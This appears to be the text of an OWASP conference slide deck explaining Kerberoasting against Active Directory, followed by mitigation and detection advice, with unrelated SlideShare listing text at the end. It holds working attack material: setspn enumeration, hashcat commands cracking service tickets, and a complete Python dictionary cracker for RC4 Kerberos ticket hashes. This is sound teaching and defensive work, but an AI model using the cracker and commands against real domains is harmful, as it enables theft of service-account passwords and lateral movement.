In the Wake of Kerberoast
Ken Kitahara
2021/12/08 @ OWASP Sendai
Background
• In Active Directory network penetration testing, password issues are a serious problem.
• Attackers and penetration testers want to obtain credentials for:
• Local Privilege Escalation
• Lateral Movement
• Domain Escalation
• Attackers and penetration testers avoid online password cracking unless it is required:
• Online password cracking (guessing against the DC or a live service) is very noisy and increases the likelihood of detection.
• So: how can we obtain password hashes for offline cracking?
Advent of Kerberoast
[Ref.] Attacking Kerberos - Kicking the Guard Dog of Hades
• https://redsiege.com/kerberoast-slides (Slide)
• https://www.youtube.com/watch?v=PUyhlN-E5MU (Video)
• Presented by Tim Medin (@TimMedin)
at SANS HackFest 2014.
• A method to obtain a service account's password hash for offline cracking, and to forge service tickets once the password is recovered.
• Local Administrator privilege is not required :)
Kerberos Authentication Flow
Parties: Client Computer, Domain Controller (running the KDC) and Application Server.
(1) AS-REQ (AS Request): The client requests a TGT (Ticket Granting Ticket) for the user account from the AS (Authentication Service) on the DC (Domain Controller).
(2) AS-REP (AS Reply): The DC sends the TGT for the requested user account to the client.
(3) TGS-REQ (TGS Request): The client presents the TGT and requests a ST (Service Ticket) for the application server from the TGS (Ticket Granting Service) on the DC.
(4) TGS-REP (TGS Reply): The TGS on the DC sends the ST for the requested service to the client.
(5) AP-REQ (Application Request): The client sends the ST to the service on the application server and requests authentication.
(6) AP-REP (Application Reply): The server authenticates the client and grants access to the service.
Kerberos Tickets
❑ TGT (Ticket Granting Ticket)
• Issued by the AS (Authentication Service) of the KDC (Key Distribution Center), which runs on the DC (Domain Controller).
• Used to request STs (Service Tickets).
• Encrypted with a key derived from the krbtgt account's password hash.
❑ ST (Service Ticket)
• Issued by the TGS (Ticket Granting Service).
• Used to authenticate to a service (file server, web server, SQL Server, etc.).
• Encrypted with a key derived from the service account's password hash.
• To obtain an ST, the client must present the TGT issued by the AS.
• [NOTE] In many security articles "TGS" is used to mean the ST itself (as in "TGS-REP hash"), not the Ticket Granting Service.
Data in the Tickets
A TGT or ST carries: Username, Session Key, Expiration Time, PAC (optional).
A ticket is encrypted with a key derived from a password hash:
❑ TGT
• The key is derived from the krbtgt account's NT (NTLM) hash.
• The krbtgt password is long and randomly generated, so it is not realistically crackable :(
❑ ST
• The key is derived from the service account's NT hash.
• If the service runs under a computer account, its password is also long and randomly generated, so it is not realistically crackable :(
• But what if the service runs under an ordinary domain user account with a human-chosen password?
Kerberoast Overview
The client already holds a TGT. It sends a TGS-REQ for the target SPN to the DC and receives a TGS-REP containing the ST, which is encrypted with the service account's key; the application server is never contacted. The encrypted part of the ST is then extracted into a crackable format, for example:
$krb5tgs$23$*sqlsvc$contoso.local$MSSQLSvc/SQL01.contoso.local:1433@contoso.local*$BB513E29A412927A81C68973A0EE38F7$5B3C8A9497F374DC9B21C70AB65E36D9......
Crack!
Original Workflow for Kerberoast
1. An attacker authenticated as a domain user requests a TGT from the AS and receives it.
2. The attacker requests an ST for the target service from the TGS and receives it.
3. The attacker exports the ticket from memory to a file.
4. The attacker extracts the hash (the encrypted part of the ST) from the ticket file.
5. The attacker cracks the hash offline and recovers the plaintext password.
6. [Optional] With the service account's password, the attacker can forge STs for that service with an arbitrary ticket owner and group membership (a "silver ticket").
Requirements for Kerberoast
• Authenticated as any domain user account.
• A domain user account (not a computer account) is used as a service account, i.e. has an SPN registered on it.
• The SPN is registered in Active Directory, so the KDC will issue a ticket for it.
• [Optional] For fast offline cracking it is preferable that the ST is encrypted with RC4 (etype 23).
• Kerberoast never communicates with the target service itself, so the target server does not need to be reachable, running, or even exist :)
Encryption Algorithms
• Tickets are encrypted with RC4, AES128 or AES256.
• With RC4 (etype 23) the encryption key is the account's NT hash itself; no salt is involved.
• With AES128 or AES256 the key is derived from the password with PBKDF2 (4096 iterations) and a salt built from the realm and the account name, which is why AES cracking is far slower (see the speed measurement later).
Account Type      Salt Format                                                                                  Example
User Account      <Domain's FQDN in upper case><Account Name in lower case>                                     The salt for jeff@contoso.local is CONTOSO.LOCALjeff
Computer Account  <Domain's FQDN in upper case>host<Host Name in lower case>.<Domain's FQDN in lower case>      The salt for pc01.contoso.local is CONTOSO.LOCALhostpc01.contoso.local
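The RC4 path above, end to end, as an added example that is not part of the original slides: the NT hash as the etype 23 key, the RFC 4757 encryption the KDC applies to the ST with key usage 2, the $krb5tgs$23$ line that hashcat -m 13100 and John consume, and the per-candidate check a cracker performs (derive K1 from the key, K3 from the exposed checksum, decrypt, verify the HMAC). The ticket plaintext, the zero confounder and the wordlist are constructed stand-ins; a real KDC uses a random 8-byte confounder and ASN.1-encoded ticket data. MD4 is implemented inline because hashlib's md4 is usually unavailable under OpenSSL 3. aes_salt only builds the salt from the table above; the AES key derivation itself is not shown.

```python
"""RC4-HMAC (etype 23) Kerberoast walk-through with constructed data: key, ticket, hash line, crack."""
import hashlib
import hmac
import struct

KU_TGS_REP_TICKET = 2  # key usage number for the ticket enc-part in a TGS-REP (RFC 4120)


def _md4(data: bytes) -> bytes:
    """MD4 in pure Python: hashlib's 'md4' is usually disabled under OpenSSL 3."""
    def rot(x, n):
        return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mix function, message-word order, shift schedule, additive constant)
        (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, order, shifts, k in rounds:
            for i, w in enumerate(order):
                a = rot((a + f(b, c, d) + X[w] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c
        h = [(p + q) & 0xFFFFFFFF for p, q in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); with etype 23 this is the long-term key itself."""
    return _md4(password.encode("utf-16-le"))


def aes_salt(realm: str, account: str) -> str:
    """Salt for the AES etypes (the key is PBKDF2 of the password with this salt, then the RFC 3962 DK step)."""
    if account.endswith("$"):  # computer account: REALM + "host" + hostname + "." + realm
        return realm.upper() + "host" + account[:-1].lower() + "." + realm.lower()
    return realm.upper() + account  # user account: REALM + account name


def _rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, confounder: bytes, plaintext: bytes):
    """RFC 4757 encryption as the KDC performs it; returns (checksum, ciphertext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext  # a real KDC uses 8 random confounder bytes
    checksum = _hmac_md5(k1, data)
    return checksum, _rc4(_hmac_md5(k1, checksum), data)


def rc4_hmac_check(key: bytes, usage: int, checksum: bytes, ciphertext: bytes) -> bool:
    """One candidate test: K3 comes from the exposed checksum, so decrypt and verify the HMAC."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    plain = _rc4(_hmac_md5(k1, checksum), ciphertext)
    return hmac.compare_digest(_hmac_md5(k1, plain), checksum)


def krb5tgs_line(user: str, realm: str, spn: str, checksum: bytes, edata: bytes) -> str:
    """hashcat -m 13100 / JtR krb5tgs format: $krb5tgs$23$*user$realm$spn*$checksum$edata2."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def crack_krb5tgs(line: str, wordlist):
    """Dictionary attack on one etype-23 line: one MD4, three HMAC-MD5s and one RC4 per guess."""
    head, checksum, edata = line.rsplit("$", 2)
    if not head.startswith("$krb5tgs$23$*"):
        raise ValueError("only etype 23 lines are handled here")
    checksum, edata = bytes.fromhex(checksum), bytes.fromhex(edata)
    for cand in wordlist:
        if rc4_hmac_check(nt_hash(cand), KU_TGS_REP_TICKET, checksum, edata):
            return cand
    return None


def demo():
    """Issue a constructed ST for sqlsvc (password from the slides), format it, crack it."""
    plaintext = b"constructed stand-in for the ASN.1 EncTicketPart of sqlsvc's ST"
    chk, edata = rc4_hmac_encrypt(nt_hash("Password123!"), KU_TGS_REP_TICKET, bytes(8), plaintext)
    line = krb5tgs_line("sqlsvc", "contoso.local", "MSSQLSvc/SQL01.contoso.local:1433", chk, edata)
    return line, crack_krb5tgs(line, ["123456", "letmein", "Password123!", "summer2021"])


if __name__ == "__main__":
    line, found = demo()
    print(line[:90] + "...")
    print("cracked:", found)
```

The cost per guess is the whole story of the speed difference measured later in the slides: for etype 23 a candidate costs one MD4 plus a few HMAC-MD5 and RC4 operations, whereas for etype 17/18 each candidate has to go through 4096 PBKDF2-HMAC-SHA1 iterations before the ticket can even be test-decrypted.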
Enumeration
• Services are identified by SPNs (Service Principal Names).
• The SPN is a key component of Kerberos authentication for realizing Single Sign-On: the client asks the KDC for a ticket to an SPN, and the KDC looks up the account that owns it.
• An SPN has the form <service class>/<host>[:<port>][/<service name>], for example MSSQLSvc/SQL01.contoso.local:1433, and is stored in the servicePrincipalName attribute of the account that runs the service.
• Attackers find Kerberoast targets by enumerating SPNs and keeping those whose owner is a domain user account.
• setspn.exe can enumerate SPNs; under the hood it issues an LDAP query.
• A direct LDAP search can also be used to find targets.
Example: the SPN MSSQLSvc/dbsrv.domain.local:1433 registered on the user object CN=dbadmin,OU=SrvAdms,DC=domain,DC=local
Enumeration : setspn.exe
C:\>setspn -T contoso.local -Q */*
Checking domain DC=contoso,DC=local
--snip--
CN=CL01,CN=Computers,DC=contoso,DC=local
RestrictedKrbHost/CL01
HOST/CL01
--snip--
CN=sqlsvc,CN=Users,DC=contoso,DC=local
MSSQLSvc/SQL01.contoso.local:1433
Existing SPN found!
This SPN record indicates:
• The domain user account contoso\sqlsvc runs SQL Server on SQL01.contoso.local.
• Attackers can request an ST for MSSQLSvc/SQL01.contoso.local:1433 and extract a Kerberos-format hash from it.
• The CL01 entries, by contrast, belong to a computer account (CN=Computers) and are not worth roasting.
Enumeration : LDAP Search
Obtain Service Tickets
Extract Service Ticket
Offline Password Crack
Password Crack Tool's Support
• John the Ripper added support for the krb5tgs format in September 2015.
• Hashcat added support for the krb5tgs format (mode 13100) in February 2016.
Invoke-Kerberoast
• If possible, attackers and penetration testers prefer not to write files to disk.
• Will Schroeder (@harmj0y) released Invoke-Kerberoast in November 2016.
• It is a PowerShell script that requests STs and outputs krb5tgs-format hashes directly, without writing ticket files.
Tools for Kerberoast
Tool               Description
kerberoast         • Original tools for Kerberoast by Tim Medin.
                   • Python scripts.
                   • Service Tickets must be exported as files.
                   • Can also extract Service Tickets from pcap files.
Invoke-Kerberoast  • PowerShell script by Will Schroeder.
                   • All operations run in memory.
Rubeus             • C# toolset for Kerberos-related attacks by Will Schroeder.
                   • Probably the most-used tool today for Kerberos-related attacks.
Real World Cases
• APT29 (a cyber espionage group with alleged ties to Russia) obtained Service Tickets for SPNs to crack offline.
• FIN7 (a financially-motivated threat group) used Kerberoasting for credential access.
• Operation Wocao (a China-based cyber espionage campaign) used Invoke-Kerberoast to request encrypted Service Tickets.
• Wizard Spider (a Russia-based financially-motivated threat group) used Rubeus, Mimikatz and Invoke-Kerberoast for credential access.
[Ref.] MITRE ATT&CK - Steal or Forge Kerberos Tickets: Kerberoasting
• https://attack.mitre.org/techniques/T1558/003/
Mitigation
• Ensure strong password length (ideally 25+ characters) and complexity for service accounts: mitigates offline cracking, because a strong password cannot be cracked in a realistic amount of time. (Group Managed Service Accounts get long random passwords rotated automatically.)
• Enable Kerberos encryption stronger than RC4 (AES) for service accounts, and update DCs to Windows Server 2019 or newer: mitigates offline cracking, because AES makes each candidate far more expensive to test (the speed measurement below shows the difference).
• Limit service account privileges: mitigates lateral movement and domain escalation after a successful crack.
Encryption Methods in Kerberos
etype        Encryption Type
16 (0x10)    des3-cbc-sha1
17 (0x11)    aes128-cts-hmac-sha1-96
18 (0x12)    aes256-cts-hmac-sha1-96
19 (0x13)    aes128-cts-hmac-sha256-128
20 (0x14)    aes256-cts-hmac-sha384-192
23 (0x17)    rc4-hmac (also written rc4-hmac-md5)
• Kerberos supports several encryption types for the encrypted part of tickets.
• In Active Directory, an account with no msDS-SupportedEncryptionTypes value gets rc4-hmac (etype 23) tickets by default.
Enable Strong Encryption Method
• AES128 / AES256 can be enabled per service account on the DC with the following procedure:
1. Open [Active Directory Users and Computers].
2. Open Properties for the service account.
3. On the [Account] tab, check the following lines in the [Account options] section:
• This account supports Kerberos AES 128 bit encryption.
• This account supports Kerberos AES 256 bit encryption.
• These checkboxes set the AES128 (0x8) and AES256 (0x10) bits of the account's msDS-SupportedEncryptionTypes attribute; with the RC4 bit (0x4) left clear, the KDC issues AES tickets for that account.
• This mitigation can be bypassed if the DC is older than Windows Server 2019 (a client can still request an RC4 ticket), but even then the downgraded request is useful for detection (see Detection : Encryption Type).
Speed Measurement (RC4)
┌──(kali㉿kali)-[~]
└─$ hashcat -m 13100 -r nsa-rules/nsa64.rule sqlsvc-rc4.txt rockyou.txt
--snip--
$krb5tgs$23$*sqlsvc$contoso.local$MSSQLSvc --snip-- 510ff11:Password123!
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*sqlsvc$contoso.local$MSSQLSvc/SQL01.co...10ff11
Time.Started.....: Tue Dec 7 06:12:39 2021 (2 secs)
Time.Estimated...: Tue Dec 7 06:12:41 2021 (0 secs)
OS : Kali Linux on VMware (Number of CPU : 2, Number of Core : 1, RAM: 2GB)
Password Dictionary : rockyou.txt
Rule : nsa-rules/nsa64.rule
Speed Measurement (AES256)
┌──(kali㉿kali)-[~]
└─$ hashcat -m 19700 -r nsa-rules/nsa64.rule sqlsvc-aes256.txt rockyou.txt
--snip--
$krb5tgs$18$sqlsvc$contoso.local$9aa3fdc96 --snip-- a793c4f:Password123!
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 18, TGS-REP
Hash.Target......: $krb5tgs$18$sqlsvc$contoso.local$9aa3fdc96a0caeb244...793c4f
Time.Started.....: Tue Dec 7 06:14:13 2021 (7 mins, 48 secs)
Time.Estimated...: Tue Dec 7 06:22:01 2021 (0 secs)
OS : Kali Linux on VMware (Number of CPU : 2, Number of Core : 1, RAM: 2GB)
Password Dictionary : rockyou.txt
Rule : nsa-rules/nsa64.rule
Same password, wordlist, rules and hardware: 2 seconds for etype 23 versus 7 minutes 48 seconds for etype 18, because every AES candidate costs a 4096-iteration PBKDF2 before the ticket can be test-decrypted, while an RC4 candidate costs one MD4 and a few HMAC-MD5 operations.
Detection : Enumeration
Tool               Common LDAP Filter
setspn.exe         (servicePrincipalName=*/*)
Invoke-Kerberoast  (&(samAccountType=805306368)(servicePrincipalName=*))
Rubeus             (&(samAccountType=805306368)(serviceprincipalname=*)(!samAccountName=krbtgt)(|(!msds-supportedencryptiontypes=*)(msds-supportedencryptiontypes=0)(msds-supportedencryptiontypes:1.2.840.113556.1.4.803:=4)))
• Most Kerberoast tools enumerate targets with an LDAP query.
• A search containing servicePrincipalName=* is rare in normal operation, so it is a good indicator for hunting Kerberoast.
• This detection can be bypassed (an attacker can enumerate differently, or query one account at a time), but it catches unmodified tooling.
Detection : Enumeration
• LDAP query logging is not enabled by default.
• To enable it, set the registry value 15 Field Engineering under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics to a number between 1 and 5. The larger the number, the higher the level of detail; Microsoft's guidance for search logging is 5.
• After setting the registry value, LDAP searches appear as event ID 1644 in the Directory Service log under Applications and Services Logs in Event Viewer.
Detection : Enumeration
The logging thresholds should be tuned. They are controlled by registry values under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters; if a value is not set, its default applies:
❑ Expensive Search Results Threshold
DWORD. Default value is 10,000. Log when more entries than this value are visited.
❑ Inefficient Search Results Threshold
DWORD. Default value is 1,000. Log when more entries than this value are visited and fewer than 10 % of them are returned.
❑ Search Time Threshold (msecs)
DWORD. Default value is 30,000. Log any search that takes longer than this value (in milliseconds).
With the defaults, an SPN search in a small domain visits far fewer than 1,000 entries and finishes in milliseconds, so it is never logged; lowering the thresholds (down to 1) logs every search, at the cost of log volume.
Detection : Enumeration
This example is generated by Rubeus.exe; the filter's components are:
❑ (sAMAccountType=805306368)
Match only normal user objects (computer accounts have sAMAccountType 805306369).
❑ (servicePrincipalName=*)
Match objects that have at least one SPN.
❑ (!(sAMAccountName=krbtgt))
Exclude the krbtgt account.
❑ (!(userAccountControl:1.2.840.113556.1.4.803:=2))
Exclude disabled users (bit 2 of userAccountControl is ACCOUNTDISABLE; 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND rule).
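To see concretely which accounts each of the three filters (Enumeration and Detection : Enumeration above) would hand to the roasting step, here is an added example, not from the original slides or from any of the tools, that parses the filters and evaluates them against constructed directory objects. The directory entries (jeff, sqlsvc, websvc, krbtgt, SQL01$) and their attribute values are invented for the illustration; the filter strings are the ones quoted on the slides. The parser covers the RFC 4515 subset those filters use plus AD's bitwise matching rules, and the same parse is reused for the 1644 hunting check: does a logged filter test servicePrincipalName with a wildcard?

```python
"""Evaluate the Kerberoast tools' LDAP filters against constructed directory objects (added example)."""
import fnmatch

# Constructed stand-ins for LDAP search results; attribute names lower-cased (LDAP is case-insensitive).
DIRECTORY = [
    {"samaccountname": ["jeff"], "samaccounttype": ["805306368"]},
    {"samaccountname": ["sqlsvc"], "samaccounttype": ["805306368"],  # no msDS-SET: RC4 by default
     "serviceprincipalname": ["MSSQLSvc/SQL01.contoso.local:1433"]},
    {"samaccountname": ["websvc"], "samaccounttype": ["805306368"],  # 24 = AES128|AES256 only
     "serviceprincipalname": ["HTTP/web01.contoso.local"], "msds-supportedencryptiontypes": ["24"]},
    {"samaccountname": ["krbtgt"], "samaccounttype": ["805306368"],
     "serviceprincipalname": ["kadmin/changepw"]},
    {"samaccountname": ["SQL01$"], "samaccounttype": ["805306369"],  # computer account
     "serviceprincipalname": ["HOST/SQL01", "HOST/SQL01.contoso.local"]},
]

FILTERS = {  # the three filters quoted in the slides
    "setspn": "(servicePrincipalName=*/*)",
    "Invoke-Kerberoast": "(&(samAccountType=805306368)(servicePrincipalName=*))",
    "Rubeus": "(&(samAccountType=805306368)(serviceprincipalname=*)(!samAccountName=krbtgt)"
              "(|(!msds-supportedencryptiontypes=*)(msds-supportedencryptiontypes=0)"
              "(msds-supportedencryptiontypes:1.2.840.113556.1.4.803:=4)))",
}
BIT_AND, BIT_OR = "1.2.840.113556.1.4.803", "1.2.840.113556.1.4.804"  # AD bitwise matching rules


def parse_filter(s: str, i: int = 0):
    """Recursive-descent parser for the RFC 4515 subset the tools use; returns (node, next_index).
    Also accepts AD's lax (!attr=value) form without parentheses around the inner item."""
    if s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    if s[i] in "&|":
        op, subs, i = s[i], [], i + 1
        while s[i] == "(":
            node, i = parse_filter(s, i)
            subs.append(node)
        return (op, subs), _expect_close(s, i)
    if s[i] == "!":
        if s[i + 1] == "(":
            node, i = parse_filter(s, i + 1)
        else:
            j = s.index(")", i)
            node, i = _item(s[i + 1:j]), j
        return ("!", [node]), _expect_close(s, i)
    j = s.index(")", i)
    return _item(s[i:j]), j + 1


def _expect_close(s, i):
    if s[i] != ")":
        raise ValueError(f"expected ')' at offset {i}")
    return i + 1


def _item(text):
    """attr=value, attr=*, attr=*sub*, or attr:ruleOID:=value -> ("item", attr, rule, value)."""
    attr, _, value = text.partition("=")
    rule = None
    if ":" in attr:
        attr, rule = attr.split(":")[:2]
    return ("item", attr.lower(), rule, value)


def matches(node, obj) -> bool:
    kind = node[0]
    if kind == "&":
        return all(matches(n, obj) for n in node[1])
    if kind == "|":
        return any(matches(n, obj) for n in node[1])
    if kind == "!":
        return not matches(node[1][0], obj)
    _, attr, rule, value = node
    values = obj.get(attr, [])
    if rule == BIT_AND:  # every bit of value is set
        return any((int(v) & int(value)) == int(value) for v in values)
    if rule == BIT_OR:   # any bit of value is set
        return any(int(v) & int(value) for v in values)
    if value == "*":     # presence
        return bool(values)
    if "*" in value:     # substring, e.g. */* = "contains a slash"
        return any(fnmatch.fnmatchcase(v.lower(), value.lower()) for v in values)
    return any(v.lower() == value.lower() for v in values)


def select(tool: str, directory=DIRECTORY):
    """Accounts a tool's default filter would return from the constructed directory."""
    tree, _ = parse_filter(FILTERS[tool])
    return [o["samaccountname"][0] for o in directory if matches(tree, o)]


def is_spn_enumeration(filter_text: str) -> bool:
    """Hunting check for a filter logged in event 1644: any wildcard test on servicePrincipalName."""
    def walk(node):
        if node[0] == "item":
            return node[1] == "serviceprincipalname" and "*" in node[3]
        return any(walk(n) for n in node[1])
    return walk(parse_filter(filter_text)[0])


if __name__ == "__main__":
    for tool in FILTERS:
        print(f"{tool:18} -> {select(tool)}")
```

Run against the constructed directory, setspn's filter returns everything with a slash in an SPN (including the computer account and krbtgt), Invoke-Kerberoast's filter drops the computer account, and Rubeus's filter also drops krbtgt and the AES-only websvc, leaving sqlsvc as the only RC4-roastable target. That last exclusion is exactly why enabling AES on service accounts shrinks what an attacker bothers to request.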
Detection : Ticket Request
• Each TGS-REQ handled by a DC raises event ID 4769 (A Kerberos service ticket was requested) in the Security log under Windows Logs.
• If the domain has many SPNs, a Kerberoast tool generates a burst of TGS-REQs from one user for many different service accounts within seconds, which is a good indicator.
• However, large numbers of TGS-REQs are generated in normal operation too, so the raw count alone is a weak signal :(
Detection : Honeypot Service
• TGS-REQs are generated constantly in a domain network, so it may be hard to find the attacker's request among them.
• [A Solution] Set up a honeypot account and honeypot service.
• Configure a fake service account with a fake SPN that no legitimate client ever uses.
• Any TGS-REQ (event 4769) naming the honeypot service account can only come from enumeration-driven ticket requests, so the attacker's intrusion is detected with essentially no false positives.
Detection : Encryption Type
• In the TGS-REQ for Kerberoasting, attackers try to downgrade the encryption type to RC4 for fast offline cracking.
• If encryption stronger than RC4 (AES) is configured for the service account, the Ticket Encryption Type field of event 4769 can be used to spot the attacker's activity:
0x17 (= 23, rc4-hmac) for a ticket to an AES-enabled service account means rc4-hmac was used, i.e. the requester performed a downgrade attack.
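The three 4769-based signals above (burst of TGS-REQs from one user, honeypot service account requested, RC4 ticket for an AES-enabled account) as one small rule set, an added example that is not part of the original slides. The event records are constructed, not real logs; they keep the 4769 field names (TargetUserName is the requesting user, ServiceName is the service account, not the SPN, TicketEncryptionType is the etype). The honeypot account name svc-honey and the set of AES-enabled accounts are assumptions standing in for what a real deployment would pull from AD.

```python
"""Kerberoast detection rules over constructed DC Security-log (event 4769) records (added example)."""
from collections import defaultdict

HONEYPOT_ACCOUNT = "svc-honey"               # fake service account carrying a fake SPN (assumed)
AES_CAPABLE_ACCOUNTS = {"sqlsvc", "websvc"}  # msDS-SupportedEncryptionTypes has the AES bits (assumed)

# Constructed 4769 records (not real logs); "t" is a time in seconds.
SAMPLE_EVENTS = [
    {"t": 5,   "TargetUserName": "jeff@CONTOSO.LOCAL",  "ServiceName": "sqlsvc",    "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.42"},
    {"t": 6,   "TargetUserName": "jeff@CONTOSO.LOCAL",  "ServiceName": "websvc",    "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.42"},
    {"t": 6,   "TargetUserName": "jeff@CONTOSO.LOCAL",  "ServiceName": "svc-honey", "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.42"},
    {"t": 7,   "TargetUserName": "jeff@CONTOSO.LOCAL",  "ServiceName": "backupsvc", "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.42"},
    {"t": 300, "TargetUserName": "alice@CONTOSO.LOCAL", "ServiceName": "sqlsvc",    "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.77"},
    {"t": 301, "TargetUserName": "PC01$@CONTOSO.LOCAL", "ServiceName": "DC01$",     "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.11"},
]


def detect(events, burst_threshold=3, window=60):
    """Return (rule, requesting user, detail) alerts: honeypot hit, RC4 downgrade, TGS-REQ burst."""
    alerts, per_user = [], defaultdict(list)
    for e in events:
        user, svc, etype = e["TargetUserName"], e["ServiceName"], e["TicketEncryptionType"]
        if svc == HONEYPOT_ACCOUNT:
            alerts.append(("honeypot_spn_requested", user, e["IpAddress"]))
        if etype == 0x17 and svc in AES_CAPABLE_ACCOUNTS:
            alerts.append(("rc4_downgrade", user, svc))
        if not svc.endswith("$"):  # tickets for computer accounts are not roastable: ignore them
            per_user[user].append((e["t"], svc))
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # distinct service accounts requested within one window
            distinct = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(distinct) >= burst_threshold:
                alerts.append(("tgs_burst", user, sorted(distinct)))
                break
    return alerts


def summarize(alerts):
    """Count alerts per rule."""
    counts = defaultdict(int)
    for rule, _, _ in alerts:
        counts[rule] += 1
    return dict(counts)


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On the sample, jeff trips all three rules within two seconds while alice's single AES ticket and the machine-to-machine ticket raise nothing. The burst rule needs tuning per environment (threshold and window), the downgrade rule is only meaningful for accounts that actually have AES enabled, and the honeypot rule needs no tuning at all, which is why it is the most reliable of the three. All of this depends on the Kerberos Service Ticket Operations audit subcategory being enabled on the DCs so that 4769 is written in the first place.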
Summary
• Kerberoast is a technique for obtaining a password hash for offline cracking.
• To mitigate the attack: enforce strong passwords, enable strong encryption algorithms, and restrict the privileges of service accounts.
• Methods such as LDAP query logging, 4769 monitoring and a honeypot service are useful for detecting the attacker's activity.

Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
 

Recently uploaded (20)

Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
In-Depth Performance Testing Guide for IT Professionals
In-Depth Performance Testing Guide for IT ProfessionalsIn-Depth Performance Testing Guide for IT Professionals
In-Depth Performance Testing Guide for IT Professionals
 
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
